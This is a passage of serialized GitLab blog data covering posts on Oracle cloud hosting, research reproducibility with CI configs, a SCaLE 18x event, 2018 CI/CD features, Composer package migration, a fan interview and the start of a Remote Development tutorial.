standards necessary to protect the federal government's data. Oracle has obtained a P-ATO from the Joint Authorization Board for FedRAMP High in its U.S. Government Cloud regions. Varying levels of DISA authorizations are also available but vary by services. Find an up-to-date list [here](https://www.oracle.com/industries/government/federal/fedramp/). Meanwhile, GitLab is pursuing a FedRAMP moderate certification and working on activities related to FedRAMP-ready designation. \n\n## Get started with the GitLab DevOps platform and OCI\nOrganizations looking to run GitLab’s DevOps platform on OCI can leverage the supported [Oracle Linux](/install/) package for the platform install. Alternatively, they can leverage the helm chart or GitLab Operator to deploy to Oracle Kubernetes Engine (OKE), which will provide a [cloud-native hybrid approach](https://docs.gitlab.com/ee/administration/reference_architectures/25k_users.html#cloud-native-hybrid-reference-architecture-with-helm-charts-alternative) of the GitLab DevOps platform on OCI.\n\nGitLab’s DevOps platform, delivered as a single application, can run on multiple clouds and has the capability of supporting various official [Linux packages](/install/). Besides Linux packages, GitLab’s platform also supports deployments on Kubernetes using [helm charts](https://docs.gitlab.com/charts/) and Kubernetes [GitLab Operator](https://docs.gitlab.com/operator/). \n\nIf you would like to learn more about the GitLab DevOps platform and OCI, please access the [LiveLabs](https://apexapps.oracle.com/pls/apex/dbpm/r/livelabs/home).\n\n_[Kelkar](https://gitlab.com/vkelkar) is GitLab's Director of Alliances. Swank is Distinguished Cloud Architect and Cloud CTO at Oracle._\n",[685,9,845,282],{"slug":2235,"featured":6,"template":689},"gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development","content:en-us:blog:gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development.yml","Gitlab And Oracle Partner For A Cloud Native Approach To Modern Application Development","en-us/blog/gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development.yml","en-us/blog/gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development",{"_path":2241,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2242,"content":2248,"config":2254,"_id":2256,"_type":14,"title":2257,"_source":16,"_file":2258,"_stem":2259,"_extension":19},"/en-us/blog/gitlab-and-reproducibility",{"title":2243,"description":2244,"ogTitle":2243,"ogDescription":2244,"noIndex":6,"ogImage":2245,"ogUrl":2246,"ogSiteName":673,"ogType":674,"canonicalUrls":2246,"schema":2247},"How GitLab can help in research reproducibility","NYU reproducibility librarian Vicky Steeves shares why GitLab is her choice for ongoing collaborative research, and how it can help overcome challenges with sharing code in academia.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749672928/Blog/Hero%20Images/gitlab-and-reproducibility.jpg","https://about.gitlab.com/blog/gitlab-and-reproducibility","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab can help in research reproducibility\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Vicky Steeves\"}],\n        \"datePublished\": \"2017-08-25\",\n      }",{"title":2243,"description":2244,"authors":2249,"heroImage":2245,"date":2251,"body":2252,"category":10,"tags":2253},[2250],"Vicky Steeves","2017-08-25","\nGitLab is a great platform for active, ongoing, collaborative research. It enables folks to work together easily and share that work in the open. This is especially poignant given the problems in sharing code in academia, across time and people.\n\n\u003C!-- more -->\n\n![phd-code-comic](https://phdcomics.com/comics/archive/phd031214s.gif)\n\nIt's no surprise that GitLab, a platform for collaborative coding and Git repository hosting, has features for reproducibility that researchers can leverage for their own and their communities’ benefit.\n\n### What exactly is reproducibility?\n\nReproducibility is a core component in a variety of work, from software engineering to research. For software engineers, the ability to reproduce errors or functionality is key to development. For researchers, reproducibility is about independent verification of results/methods, to build on top of previous work, and to increase the impact, visibility, and quality of research. Y’know. That Sir Isaac Newton quote in every reproducibility presentation ever: \"If I have seen further, it is by standing on the shoulders of giants.\"\n\nLike all things, reproducibility exists on a spectrum. I like Stodden et al’s definitions from the [2013 ICERM report](http://stodden.net/icerm_report.pdf), so I’ll use those:\n\n| ICERM Report Definitions | Potential Real-World Examples |\n|:-----------------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------------------------------------------------|\n| Reviewable Research: Sufficient detail for peer review and assessment                            | The code and data are openly available |\n| Replicable Research: Tools are available to duplicate the author’s results using their data    | The tools (software) used in the analysis are freely available for others to confirm results                                   |\n| Confirmable Research: Main conclusions can be attained independently without author’s software | Others can reach the conclusion using similar tools, not necessarily the same as the author, or on a different operating system |\n| Auditable Research: Process and tools archived such that it can be defended later if necessary   | The tools, environment, data, and code are put into a preservation-ready format                                                |\n| Open/Reproducible Research: Auditable research made openly available                           | Everything above is made available in a repository for others to examine and use                                               |\n\nThe last bullet there is the goal – open and reproducible research. Releasing code and data are key to open research, but not necessarily enough for reproducibility. This is where the concept of computational reproducibility becomes important, where whole environments are captured. You could also look at it this way:\n\n![reproducibility-pyramid](https://osf.io/8rx9y/download)\n\n### How can GitLab help?\n\nThere are a few solutions out there, including containers (such as Docker or Singularity) for active research, and [o2r](http://o2r.info/) and [ReproZip](https://reprozip.org) for capturing and reproducing completed research. For this post, I’m going to focus on active research and containers.\n\nI like GitLab for research reproducibility because it makes working together simple, and seamless. There’s no hacking together 100 different third-party services. GitLab has hosting, LFS, and integrated Continuous Integration for free, for both public and private repositories! Everything is integrated in a single GitLab repository which, if made publicly available, can enable secondary users to reproduce results in a more streamlined fashion. You can also keep these private to a group – you control the visibility of everything in one repository in one place, as opposed to updating permissions across multiple services.\n\nThere are a few key features that set GitLab apart when it comes to containers and reproducibility. The first is that GitLab doesn’t use a third-party service for continuous integration. It’s shipped with CI runners which can use Docker images from GitLab’s registry. Basically, you can use the Docker Container Registry, a secure, private Docker registry, to choose a container that GitLab CI uses to run each job in a separate and isolated container.\n\n![gitlab-ci-repro](https://about.gitlab.com/images/ci/arch-1.jpg)\n\nIf you don’t feel like using the GitLab registry, you can also use images from DockerHub or a custom Docker container you’re already using locally. These can be integrated with GitLab CI, and if made public, any secondary users can use it as well!\n\n### Let's look at an example\n\nThis process is set up in a single file, a `.gitlab-ci.yml`. Another feature that makes my life easier – GitLab can syntax-check the CI config files! The `.gitlab-ci.yml` file describes the pipelines and stages, each of which has a different function and can have its own tags, produce its own artifacts, and reuse artifacts from other stages. These stages can also run in parallel if needed. Here’s an example of what a basic config file looks like with R:\n\n```\nimage: jangorecki/r-base-dev\ntest:\n  script:\n    - R CMD build . --no-build-vignettes --no-manual\n    - PKG_FILE_NAME=$(ls -1t *.tar.gz | head -n 1)\n    - R CMD check \"${PKG_FILE_NAME}\" --no-build-vignettes --no-manual --as-cran\n```\n\nAnd here’s an example of building a website using the GitLab and the static site generator, Nikola:\n\n```\nimage: registry.gitlab.com/paddy-hack/nikola:7.8.7\ntest:\n  script:\n  - nikola build\n  except:\n  - master\n\npages:\n  script:\n    - nikola build\n  artifacts:\n    paths:\n    - public\n  only:\n  - master\n```\n\nIt’s also worth noting that you can use different containers per step in your workflow, if you outline it in your .gitlab-ci.yml. If your data collection script runs in one environment but your analysis script needs another, that’s perfectly fine using GitLab, and others have the information to reproduce it easily! Another feature that puts GitLab apart is that a build of one project can trigger a build of another – AKA, multi-project pipelines. For those of you working with big data, you can automatically spin up and down VMs to make sure your builds get processed immediately with GitLab’s CI as well.\n\nHere are some other great resources and examples of using GitLab to make research more reproducible:\n\n+ [Gitlab-CI for R packages](https://gitlab.com/jangorecki/r.gitlab.ci)\n+ [Blog Post explaining GitLab + reproducibility - Jon Zelner](http://www.jonzelner.net/statistics/make/docker/reproducibility/2016/05/31/reproducibility-pt-1/)\n+ [GitLab repo accompanying blog post - Jon Zelner](https://gitlab.com/jzelner/reproducible-stan)\n+ [Continuous Integration with Gitlab - Tony Wildish](https://www.nersc.gov/assets/Uploads/2017-02-06-Gitlab-CI.pdf)\n\nBeyond reproducibility, there are a lot of features that make GitLab an ideal place for me to work and organize my research. I’d urge folks to look at the [feature list](/pricing/feature-comparison/) and see how they can get started!\n\n## About the Guest Author\n\nVicky Steeves is the Librarian for Research Data Management and Reproducibility at New York University, a dual appointment between the Division of Libraries and Center for Data Science. In this role, she works supporting researchers in creating well-managed, high quality, and reproducible research through facilitating use of tools such as ReproZip. Her research centers on integrating reproducible practices into the research workflow, advocating openness in all facets of scholarship, and building/contributing to open infrastructure.\n\n“[research](https://www.flickr.com/photos/alovesdc/3464555556/)” by [a loves dc](https://www.flickr.com/photos/alovesdc/) is licensed under [CC BY 2.0](https://creativecommons.org/licenses/by/2.0/legalcode)\n{: .note}\n",[9,779,910],{"slug":2255,"featured":6,"template":689},"gitlab-and-reproducibility","content:en-us:blog:gitlab-and-reproducibility.yml","Gitlab And Reproducibility","en-us/blog/gitlab-and-reproducibility.yml","en-us/blog/gitlab-and-reproducibility",{"_path":2261,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2262,"content":2267,"config":2272,"_id":2274,"_type":14,"title":2275,"_source":16,"_file":2276,"_stem":2277,"_extension":19},"/en-us/blog/gitlab-at-scale",{"title":2263,"description":2264,"ogTitle":2263,"ogDescription":2264,"noIndex":6,"ogImage":1348,"ogUrl":2265,"ogSiteName":673,"ogType":674,"canonicalUrls":2265,"schema":2266},"Join the GitLab Community Day at SCaLE 18x!","If you're attending SCaLE 18x, here's how you can find the GitLab community at the event.","https://about.gitlab.com/blog/gitlab-at-scale","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join the GitLab Community Day at SCaLE 18x!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-02-17\",\n      }",{"title":2263,"description":2264,"authors":2268,"heroImage":1348,"date":2269,"body":2270,"category":951,"tags":2271},[704],"2020-02-17","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nWe just returned from [FOSDEM](https://fosdem.org/2020/), where we had a great time meeting with and talking to GitLab community members. We will be on the road again to Southern California in a few weeks at [SCaLE 18x](https://www.socallinuxexpo.org/scale/18x), and hope to meet with wider GitLab community members at the event! If you are not familiar with SCaLE, it is the largest volunteer-organized open-source and free software event in North America. This year will be the 18th edition of the conference, and the SCaLE team provided us with a 40% discount code for GitLab community. When you [register](https://register.socallinuxexpo.org/reg6/), you can use the code `GIT` for the discount!\n\n### GitLab Community Day\n\nThis year, we are organizing a [GitLab Community Day](https://www.socallinuxexpo.org/scale/18x/gitlab-community-day), where we will have a discussion on resources for the wider community, a hands-on workshop on how you can contribute to GitLab, and a tutorial on how to use GitLab.\n\nSeveral team members from the [GitLab Developer Relations team](https://about.gitlab.com/company/team/?department=community-relations) will be at SCaLE 18x this time around. If you're interested in learning more about GitLab's programs for supporting code contributors, educational institutions, evangelists, open source communities, and more, we'd love to meet you in person.\n\n- **WHEN**: Friday, March 6th, from 1:30 p.m to 5:30 p.m. \n- **WHERE**: **Ballroom F** at the Pasadena Convention Center\n\nYou can find more information on topics and speakers on the [Gitlab Community Day issue](https://gitlab.com/gitlab-com/marketing/community-relations/evangelist-program/general/issues/900). You are welcome to add feedback or suggestions directly on the issue.  \n\n### DevOpsDay LA \n\nGitLab will again be a sponsor for [DevOpsDay LA](https://www.socallinuxexpo.org/scale/18x/devopsday-la) at SCaLE, and we will have a **GitLab booth** in the DevOpsDay LA exhibit area on March 6th. If you want to come talk to GitLab team members about anything DevOps, please swing by our booth and checkout some GitLab swag. Speaking of swag, there will also be a raffle at 3:35pm where the winner will get a Nintendo Switch! So, please be sure to enter the raffle while you visit the GitLab booth. \n\n- **WHEN**: Friday, March 6th, all day \n- **WHERE**: **Ballroom DE** at the Pasadena Convention Center\n\n\n### Talks given by GitLab team members at SCaLE 18x\n\nA couple of GitLab team members will be speaking at the conference:\n\n- On Friday March 6th, [Francis Potter](https://gitlab.com/francispotter) will discuss [The Future of DevOps and the Importance of Right-to-Left Thinking](https://www.socallinuxexpo.org/scale/18x/presentations/future-devops-and-importance-right-left-thinking) in the DevOps track.\n- On Saturday March 7th, I ([Ray Paik](https://gitlab.com/rpaik)) will be talking about [Building a thriving community in (for-profit) open source projects](https://www.socallinuxexpo.org/scale/18x/presentations/building-thriving-community-profit-open-source-projects) in the Mentoring track. \n\n\n\nPlease come say hi 👋 at SCaLE, and we look forward to seeing many of you in sunny Southern California!\n",[267,779,9],{"slug":2273,"featured":6,"template":689},"gitlab-at-scale","content:en-us:blog:gitlab-at-scale.yml","Gitlab At Scale","en-us/blog/gitlab-at-scale.yml","en-us/blog/gitlab-at-scale",{"_path":2279,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2280,"content":2286,"config":2292,"_id":2294,"_type":14,"title":2295,"_source":16,"_file":2296,"_stem":2297,"_extension":19},"/en-us/blog/gitlab-ci-cd-features-improvements",{"title":2281,"description":2282,"ogTitle":2281,"ogDescription":2282,"noIndex":6,"ogImage":2283,"ogUrl":2284,"ogSiteName":673,"ogType":674,"canonicalUrls":2284,"schema":2285},"GitLab CI/CD's 2018 highlights","We move quickly, always with an eye to the future, but let's take a moment to look back on how GitLab CI/CD has evolved in the past six months.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663779/Blog/Hero%20Images/cicd-2018_blogimage.jpg","https://about.gitlab.com/blog/gitlab-ci-cd-features-improvements","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab CI/CD's 2018 highlights\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jason Yavorska\"}],\n        \"datePublished\": \"2019-01-21\",\n      }",{"title":2281,"description":2282,"authors":2287,"heroImage":2283,"date":2289,"body":2290,"category":299,"tags":2291},[2288],"Jason Yavorska","2019-01-21","\nHello everyone, and happy New Year! For those who don't know me, my name is [Jason Yavorska](/company/team/#jyavorska) and I've been the product manager of GitLab CI/CD since around the middle of last year. 2018 was a big year for CI/CD improvements in GitLab, and I'm so proud of our team and what we've been able to deliver in partnership with you, our users. Even just looking back on the last six months of improvements, we've delivered a ton of changes that move our vision for CI/CD forward, address important asks from our users, and build the foundation for an amazing 2019.\n\nBelow are a few of the highlights from my time here so far; be sure to let me know in the comments if I missed something that meant a lot to you.\n\n## Access control for GitLab Pages\n\nOne of the most amazing things about working for an open core company like GitLab is that our community of users can play an outsized role in how our product grows and develops, thanks to their always impressive contributions. Last year we introduced [Access control for Pages (11.5)](https://gitlab.com/gitlab-org/gitlab-ce/issues/33422), a feature with 304 👍 that was actually part of our 2019 vision, and was built thanks to a significant community contribution from MVP [Tuomo Ala-Vannesluoma](https://gitlab.com/tuomoa).\n\nThis was not just a great feature, but also highlights how GitLab and community contributors can work together to do amazing things. It came out shortly after I joined as a new product manager here, and it really opened my eyes to the possibilities inherent in working together transparently and openly with our user community. Now I don't think I could ever go back to any other way of working.\n\n## Feature flags\n\nI'm always looking for ways to expand our horizons and bring more great capabilities into the CI/CD space, and the team achieved that last year with [Allow users to create and manage feature flags for their applications (11.4)](https://gitlab.com/gitlab-org/gitlab-ee/issues/6220). A major piece of our 2018 vision, feature flags are so important to continuous delivery workflows since they allow you to safely isolate delivering your code to production, from the moment users engage with it, giving you more control and better options when it comes to how and when you deliver software.\n\n![CI/CD feature flags](https://about.gitlab.com/images/blogimages/cicd-feature_flags.png){: .shadow.medium.center}\n\n## Pipelines for merge requests\n\nSometimes, what you do in one year may be valuable on its own, but it also helps establish a foundation for more in the future. A common request from the community last year had been to make pipelines more aware of merge requests, so that at runtime, information such as the target branch, merge request name and ID, and other information was available to the pipeline. In 2018 we introduced [`only/except: merge_requests` for merge request pipelines (11.6)](https://gitlab.com/gitlab-org/gitlab-ce/issues/15310), which created this linkage. One great way to take advantage of this feature already is to use it to only create [Review Apps](https://docs.gitlab.com/ee/ci/review_apps/) on merge requests, helping to save money on environments versus creating them for every pipeline.\n\nPerhaps even more exciting than this feature on its own, is that it will continue to evolve and grow into the ability to [Run a pipeline on what the merged result will be](https://gitlab.com/gitlab-org/gitlab-ee/issues/7380). I can already say with confidence that this will be a game changer for teams that want to prioritize keeping their `master` branch green. As far as predicting the future outside of GitLab, I'm still accepting merge requests for that 😉\n\n![pipelines for merge requests](https://about.gitlab.com/images/blogimages/cicd-mr_pipelines.png){: .shadow.medium.center}\n\n## Usability improvements for the merge request widget\n\nSpeaking of merge requests, in general the team has made a lot of improvements to how the merge request widget interacts with CI/CD. We added [JUnit XML Test Summary (11.2)](https://gitlab.com/gitlab-org/gitlab-ce/issues/45318), part of our 2018 vision to make testing a more interactive part of the CI pipeline. We also now [Show enhanced information on running deploys (11.5)](https://gitlab.com/gitlab-org/gitlab-ce/issues/25140), and [Link directly to changed pages in Review App (11.5)](https://gitlab.com/gitlab-org/gitlab-ce/issues/33418), which uses [Route Maps](https://docs.gitlab.com/ee/ci/environments/index.html#go-directly-from-source-files-to-public-pages-on-the-environment) to send you directly to the updated content. Both of these changes were welcome improvements that made it much easier to see what was going on, all in one place.\n\n![CI/CD review app link](https://about.gitlab.com/images/blogimages/cicd-reviewapp_link.png){: .shadow.medium.center}\n\n## #movingtogitlab\n\n[#movingtogitlab](https://twitter.com/hashtag/movingtogitlab?src=hash) was an exciting movement in 2018, and I wanted to ensure a great experience for everyone checking us out, even if they were just trying out GitLab CI or other features, and still using GitHub for repositories. One of the challenges that people ran into early on was the way status checks were named by GitLab CI, which didn't play nicely with the way GitHub expected them to work. The team was able to introduce [Name status checks consistently to support GitHub-integrated CI workflow (11.5)](https://gitlab.com/gitlab-org/gitlab-ce/issues/53902) as a change to unblock this, ensuring a valuable experience for everyone, even if you weren't ready to go \"all in\" on GitLab yet.\n\n## Stewardship\n\nHere at GitLab, we take [stewardship of open source](/company/stewardship/) seriously. I was very happy to move the `include:` keyword from paid to free, because I know how important it is for CI/CD users to support proper reuse instead of copy-pasted code. [Move \"include external files in .gitlab-ci.yml\" from Starter to Core (11.4)](https://gitlab.com/gitlab-org/gitlab-ce/issues/42861) (with a grand total of 267 👍 on the issue) achieved this, and opened up new doors, not just for avoiding duplication, but also for more secure ways of implementing common workflows by moving compliance, security, and governance job implementation to a centrally controlled location.\n\n## Honorable mentions\n\nThere wasn't enough time to cover everything in this post without making it a mile long, but there are a few other honorable mentions I want to call out:\n\n- [11.2: Manually stopping environments](https://gitlab.com/gitlab-org/gitlab-ce/issues/25388) (with 245 👍 from our users) added the ability to manually stop your environments, such as review apps, instead of only through pipeline automation.\n- [11.3: Improve handling of includes in `.gitlab-ci.yml` to better enable script reuse/templates](https://gitlab.com/gitlab-org/gitlab-ce/issues/51521) introduced a new way to `extend` your job definitions using templates, including from across different files.\n- [11.4: Run jobs only/except when there are changes for a given path or file](https://gitlab.com/gitlab-org/gitlab-ce/issues/19232) (with a whopping 424 👍) gave you the ability to control whether a job runs or not, based on which files were changed.\n- [11.4: Add support for interactive web terminal to Docker executor](https://gitlab.com/gitlab-org/gitlab-runner/issues/3467) let you connect an interactive to a build/deploy environment and troubleshoot on the live runner host.\n- [11.4: Add timed deployments to AutoDevOps incremental rollouts](https://gitlab.com/gitlab-org/gitlab-ee/issues/7545) enabled new deployment strategies where the rollout was done over time in phases.\n- [11.5: `parallel` job keyword to speed up pipelines](https://gitlab.com/gitlab-org/gitlab-ce/issues/21480) added an easy way to run parallel instances of a job without creating duplicate jobs in your `gitlab-ci.yml`.\n- [11.6: Allow pipelines to be deleted by project owners](https://gitlab.com/gitlab-org/gitlab-ce/issues/41875) (265 👍) gave control over removing old and invalid pipelines, as well as those which may have accidentally included sensitive information in the outputs.\n\n## What's next?\n\nOf course, the mission to improve GitLab CI/CD doesn't stop here. We're bringing [Brendan O'Leary](/company/team/#olearycrew) on board as the full-time product manager for CI (what we call the [Verify stage](/stages-devops-lifecycle/verify/)), freeing me up to focus entirely on CD (what we call [Release](/stages-devops-lifecycle/release/)). We're also significantly growing headcount for the engineering teams supporting us. Having full-time product managers and larger teams dedicated to each of these stages is going to allow us to deliver even more amazing things, even faster.\n\nI've touched on a couple points above, but tried to avoid making this a preview of what's coming for CI/CD in 2019. If you're interested in where Brendan and I are headed, you can visit our direction pages for [Verify (CI)](/direction/verify/) and [Release (CD)](/direction/release/), and feel free to reach out to us directly if you'd like to have a conversation – we'd love to chat about your ideas. Being a transparent, open core company, we also welcome participation in all of our public issues (which you'll find linked to from the above direction pages). For me, the best part of this job is interacting with you, the users of GitLab, so thank you for that opportunity. Here's to another great year of working together to make the job of delivering software fun and rewarding!\n\n## Just one more thing...\n\nI'd be remiss if I didn't mention how great GitLab is as a place to work. If you're interested in joining our all-remote team, we're constantly growing and looking for great PMs and others to join us. Check out [our jobs page](/jobs/) to learn more. I'd encourage you to apply even if you don't see an exact match – GitLab is great at finding the right fit for the right personality, even if that's not exactly listed on our hiring website. If you're really unsure, feel free to reach out to me directly ([@j4yav](https://twitter.com/j4yav)) and I'll help you get in touch with the right person.\n",[1036,267,1099,803,9],{"slug":2293,"featured":6,"template":689},"gitlab-ci-cd-features-improvements","content:en-us:blog:gitlab-ci-cd-features-improvements.yml","Gitlab Ci Cd Features Improvements","en-us/blog/gitlab-ci-cd-features-improvements.yml","en-us/blog/gitlab-ci-cd-features-improvements",{"_path":2299,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2300,"content":2306,"config":2312,"_id":2314,"_type":14,"title":2315,"_source":16,"_file":2316,"_stem":2317,"_extension":19},"/en-us/blog/gitlab-composer-packages-migration-path",{"title":2301,"description":2302,"ogTitle":2301,"ogDescription":2302,"noIndex":6,"ogImage":2303,"ogUrl":2304,"ogSiteName":673,"ogType":674,"canonicalUrls":2304,"schema":2305},"Migrate composer packages to GitLab","GitLab Packages now ships with a composer registry","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681586/Blog/Hero%20Images/gitlab-composer-package-migration.jpg","https://about.gitlab.com/blog/gitlab-composer-packages-migration-path","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Migrate composer packages to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jochen Roth\"}],\n        \"datePublished\": \"2020-09-22\",\n      }",{"title":2301,"description":2302,"authors":2307,"heroImage":2303,"date":2309,"body":2310,"category":951,"tags":2311},[2308],"Jochen Roth","2020-09-22","\n\n{::options parse_block_html=\"true\" /}\n\n\n\n## Manage Composer Packages in Gitlab\n\nWith Gitlab 13.3, a repository for composer packages was introduced. This allows you to store and manage your private and public composer packages in your Gitlab instance.\n\n### Create Packages\n\nCreating packages is only a matter of adding the composer template to your `.gitlab-ci.yml`. Gitlab will automatically create a package when a git tag was created or a commit was pushed to a branch.\n\n[\u003Cimg src=\"/images/blogimages/select-template.png\" width=\"500\" height=\"auto\">](/images/blogimages/select-template.png)\n\n### Migrate your Packages to Gitlab\n\nYou might wonder how to create packages for your existing tags of each repository.\n\nYou have 2 options:\n\n1. Use curl to create packages manually e.g. ```curl --data tag=1.0.0 'https://__token__:\u003Cpersonal-access-token>@gitlab.com/api/v4/projects/\u003Cproject_id>/packages/composer'```\n2. Use [this package](https://gitlab.com/ochorocho/gitlab-create-package-versions), which will create all packages and their versions for you using the Gitlab API.\n\n## Conclusion\n\nSo far it is working pretty well. Publish and install packages works flawlessly. Managing permissions for a package is a breeze.\n\nCurrently there is only a group endpoint. I could imagine others may require an instance endpoint to be able to access all packages of a Gitlab instance using a single endpoint/repository.\nFor now you have to add multiple endpoints/repositories to your composer.json for each group.\n\nIn my company, one group contains all shared projects and we were able circumvent adding multiple endpoints/repositories.\n\nThere is always room for improvement. For example, the GUI should show more [details about the size of packages and how it was published (manually or via CI)](https://gitlab.com/gitlab-org/gitlab/-/issues/254385) and [semantic versioning is not fully supported](https://gitlab.com/gitlab-org/gitlab/-/issues/240887).\nIf you are interested in GitLab or Composer, both issues are great ways to contribute, so that we can continue to improve this product together.\n\n## Resources\n\n* [GitLab Packages Docs](https://docs.gitlab.com/ee/user/packages/composer_repository/)\n* [Composer Docs](https://getcomposer.org/doc/)\n* [Migrate to Gitlab Packages](https://gitlab.com/ochorocho/gitlab-create-package-versions)\n",[9,686,231],{"slug":2313,"featured":6,"template":689},"gitlab-composer-packages-migration-path","content:en-us:blog:gitlab-composer-packages-migration-path.yml","Gitlab Composer Packages Migration Path","en-us/blog/gitlab-composer-packages-migration-path.yml","en-us/blog/gitlab-composer-packages-migration-path",{"_path":2319,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2320,"content":2326,"config":2331,"_id":2333,"_type":14,"title":2334,"_source":16,"_file":2335,"_stem":2336,"_extension":19},"/en-us/blog/gitlab-fan-profile",{"title":2321,"description":2322,"ogTitle":2321,"ogDescription":2322,"noIndex":6,"ogImage":2323,"ogUrl":2324,"ogSiteName":673,"ogType":674,"canonicalUrls":2324,"schema":2325},"Today is GitLab Fan Day","Join us in celebrating our most mysterious evangelist, GitLab Fan.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671316/Blog/Hero%20Images/gitlab-fan-day.png","https://about.gitlab.com/blog/gitlab-fan-profile","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Today is GitLab Fan Day\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2017-09-07\",\n      }",{"title":2321,"description":2322,"authors":2327,"heroImage":2323,"date":2328,"body":2329,"category":10,"tags":2330},[1859],"2017-09-07","\n\nToday we're celebrating [GitLab Fan](https://gitlabfan.com/) and the great work they do to evangelize GitLab 🎉 Read on to learn more about the mysterious figure behind the Fan, and take a look around [our site](/) and see if you can spot any of their illustrations. Also, don't forget to visit us on Twitter to take part in our giveaway – you could get your hands on some awesome, custom GitLab Fan swag.  \n\n\u003C!-- more -->\n\nAt GitLab we're passionate about building a platform where everyone can contribute, and GitLab Fan is a great example of the work our community does, from creating [custom stickers for Telegram and Slack](https://gitlabfan.com/gitlab-stickers-for-telegram-and-slack-16639b2c126) to sharing [tutorials](https://gitlabfan.com/setting-up-your-own-fully-functional-gitlab-https-registry-ci-runners-79901ac617c0) and [takeaways from our culture](https://gitlabfan.com/7-examples-of-extreme-transparency-of-gitlab-e257796c9ef4).\n\nWhile GF's identity remains a mystery (Honest! If they're a GitLab team-member, they're undercover 🕵️), we did get a chance to ask them some questions:\n\n### What inspired you to launch GitLabFan.com?\n\nI used to work with GitLab a lot and I liked it, so I had a lot of thoughts I wanted to share with people.\n\n### Do you use GitLab for work or personal projects (or both)?\n\nMostly personal projects these days.\n\n### What kind of work do you do?\n\nI teach junior developers. By the way, I've started to work on [a course about GitLab CI](https://www.indiegogo.com/projects/learn-continuous-integration-with-gitlab-ci#/) ;)\n\n### Do you work for GitLab? (We have to ask!)\n\nNo, I don't :)\n\n### Have you ever thought about applying to work for GitLab?\n\nYup, I actually did that. But it was not a very serious intention, I did that for fun. Twice :)\n\n### If you could change or improve anything about GitLab, what would it be and why?\n\nI would love to see a built-in chat solution, in the same way that GitLab has built-in CI. That will save some time when you set up a new project, and I am also sure there would be some nice synergistic effects.\n\n**Thanks, GitLab Fan, for everything you do.**\n\n*We're giving away some specially designed GitLab Fan swag over on [Twitter](https://twitter.com/gitlab) – head there now to join in!*\n",[267,9],{"slug":2332,"featured":6,"template":689},"gitlab-fan-profile","content:en-us:blog:gitlab-fan-profile.yml","Gitlab Fan Profile","en-us/blog/gitlab-fan-profile.yml","en-us/blog/gitlab-fan-profile",{"_path":2338,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2339,"content":2345,"config":2351,"_id":2353,"_type":14,"title":2354,"_source":16,"_file":2355,"_stem":2356,"_extension":19},"/en-us/blog/gitlab-gdk-remote-development",{"title":2340,"description":2341,"ogTitle":2340,"ogDescription":2341,"noIndex":6,"ogImage":2342,"ogUrl":2343,"ogSiteName":673,"ogType":674,"canonicalUrls":2343,"schema":2344},"Contributor how-to: Remote Development workspaces and GitLab Developer Kit","This tutorial helps you get GDK working inside Remote Development workspaces to begin contributing to GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670563/Blog/Hero%20Images/cloudcomputing.jpg","https://about.gitlab.com/blog/gitlab-gdk-remote-development","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Contributor how-to: Remote Development workspaces and GitLab Developer Kit\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Raimund Hook\"}],\n        \"datePublished\": \"2023-07-31\",\n      }",{"title":2340,"description":2341,"authors":2346,"heroImage":2342,"date":2348,"body":2349,"category":801,"tags":2350},[2347],"Raimund Hook","2023-07-31","\nOpen source is fundamental to GitLab. We believe that [everyone can contribute](https://about.gitlab.com/company/mission/#mission).\nTypically, we recommend that anyone contributing anything more than basic changes to GitLab run the [GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit) (GDK). Because contributors can't always meet the GDK's resource demands, we're working to enable GDK inside the cloud-based GitLab Remote Development workspaces.\n\nIn this article, I'll explain how I used a Remote Development workspace running in my Kubernetes cluster to make working with the GDK faster and easier.\n\n## A preliminary note\nFirst, keep in mind that as of this writing the [Remote Development workspaces](https://about.gitlab.com/direction/create/ide/remote_development/) feature is still in Beta. My example here is therefore very much a proof of concept — and as such, it has some rough edges.\n\nBefore getting started, I followed the \"[Set up a workspace](https://docs.gitlab.com/ee/user/workspace/#set-up-a-workspace)\" prerequisites guide in the GitLab docs. For a more detailed set of instructions, see Senior Developer Evangelist Michael Friedrich's tutorial on [how to set up infrastructure for cloud development environments](https://about.gitlab.com/blog/set-up-infrastructure-for-cloud-development-environments/).\n\n## Getting started with workspaces\nTo start using workspaces, you will need a project configured with a `.devfile.yaml`. GitLab team members have curated [a number of example projects](https://gitlab.com/gitlab-org/remote-development/examples) you can review.\n\nInitially, I tried to do this with a fork of the GitLab project itself, but I ran into [some issues](https://gitlab.com/gitlab-org/gitlab/-/issues/414011) when the workspace begins cloning the repository.\n\nTo figure out what was causing my problems, I looked more closely at what happens 